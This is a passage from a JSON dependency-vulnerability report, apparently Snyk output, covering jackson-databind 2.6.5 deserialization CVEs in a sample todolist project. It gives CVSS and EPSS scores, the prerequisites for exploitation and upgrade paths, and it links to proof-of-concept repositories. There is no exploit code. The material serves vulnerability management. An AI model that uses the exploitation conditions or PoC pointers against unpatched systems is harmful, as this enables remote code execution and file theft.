], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1855", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/irsl/jackson-rce-via-spel/", - "title": "PoC Project" - } - ], - 
"cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:06.545272Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:58.597489Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:20.686860Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:06.545272Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:58.597489Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1855)\n- [PoC Project](https://github.com/irsl/jackson-rce-via-spel/)\n", - "epssDetails": { - "percentile": "0.95701", - "probability": "0.13977", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-17485" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-01-11T11:41:28.547000Z", - "functions_new": [ - { - "version": [ - "[,2.8.11)", - "[2.9,2.9.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-01-10T11:41:28Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - 
"publicationTime": "2018-01-22T12:30:55Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:58.597489Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.8.11" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32044", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Rui Chong" - ], - "semver": { - "vulnerable": [ - "[,2.8.11)", - "[2.9.0,2.9.4)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.8.11", - "2.9.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.8.11)", - "[2.9,2.9.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1899", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:48.440088Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - 
"modificationTime": "2024-03-11T09:53:59.857985Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:07.715996Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:48.440088Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:59.857985Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) and [CVE-2017-17485](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043)). This is exploitable via two different gadgets that bypass a blacklist.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1899)\n", - "epssDetails": { - "percentile": "0.94704", - "probability": "0.09270", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-5968" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-w3f4-3q6j-rh82" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-01-22T15:40:18.105000Z", - "functions_new": [ - { - "version": [ - "[,2.8.11)", - "[2.9,2.9.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-01-18T15:40:18Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": 
"2018-01-23T13:17:24Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:59.857985Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.8.11" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32111", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.5)", - "[2.7.0, 2.8.11.1)", - "[2.9.0, 2.9.5)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.6.7.5", - "2.8.11.1", - "2.9.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.8.11.1)", - "[2.9.0,2.9.5)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1931", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:58.671582Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, 
- "modificationTime": "2024-03-11T09:53:49.486075Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:59.859910Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:58.671582Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:49.486075Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the `c3p0` libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.5, 2.8.11.1, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1931)\n", - "epssDetails": { - "percentile": "0.99133", - "probability": "0.93631", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-7489" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-cggj-fvv3-cqwv" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-02-26T15:13:40.723000Z", - "functions_new": [ - { - "version": [ - "[,2.8.11.1)", - "[2.9.0,2.9.5)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-02-10T15:13:40Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": 
"2018-02-26T15:13:40Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:49.486075Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.5" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450207", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.9.1", - "2.8.11.4", - "2.7.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.9, - "functions": [ - { - "version": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2341", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/Al1ex/CVE-2019-12814", - "title": "PoC Repository" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 5.9, - "modificationTime": "2024-03-11T09:53:36.647712Z" - }, - { - "assigner": 
"Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:50.077144Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:15.371549Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:36.647712Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:50.077144Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2341)\n- [PoC Repository](https://github.com/Al1ex/CVE-2019-12814)\n", - "epssDetails": { - "percentile": "0.87218", - "probability": "0.01539", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-12814" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-cmfg-87vq-g5g4" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-06-19T15:28:46.421239Z", - "functions_new": [ - { - "version": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-06-19T14:34:16Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": 
"com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-06-19T14:34:16Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:50.077144Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.7.9.6" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450917", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "credit": [ - "College of software Nankai University" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.9.9.1", - "2.8.11.4", - "2.7.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": "This vulnerability is only applicable when the feature Polymorphic Type Handling (PTH) is enabled." 
- }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html", - "title": "Debian Security Announcement" - }, - { - "url": "https://github.com/jas502n/CVE-2019-12384", - "title": "Exploit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", - "title": "Github Fix" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2334", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Jackson CVEs Don't Panic - Blog" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x", - "title": "Release Notes" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 5.9, - "modificationTime": "2024-03-11T09:53:36.645685Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:50.734463Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": 
